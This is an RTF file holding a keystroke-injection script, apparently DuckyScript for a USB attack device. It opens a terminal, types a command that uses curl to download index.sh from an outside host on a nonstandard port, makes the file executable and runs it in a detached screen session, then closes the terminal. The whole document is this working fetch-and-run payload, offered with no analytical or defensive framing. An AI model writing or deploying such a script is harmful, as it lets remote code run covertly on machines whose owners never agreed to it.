{\rtf1\ansi\ansicpg1252\cocoartf2761
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fnil\fcharset0 Menlo-Regular;}
{\colortbl;\red255\green255\blue255;\red0\green0\blue0;}
{\*\expandedcolortbl;;\cssrgb\c0\c0\c0;}
\paperw11900\paperh16840\margl1440\margr1440\vieww11520\viewh8400\viewkind0
\pard\tx560\tx1120\tx1680\tx2240\tx2800\tx3360\tx3920\tx4480\tx5040\tx5600\tx6160\tx6720\pardirnatural\partightenfactor0

\f0\fs22 \cf2 DELAY 1000\
GUI\
DELAY 500\
STRING terminal\
DELAY 500\
ENTER\
DELAY 1000\
STRING screen -m -d curl -s -O http://vyapar.vaisworks.com:32774/\
index.sh && sleep 5 && chmod +x index.sh && screen -m -d bash index.sh\
ENTER\
STRING exit\
ENTER}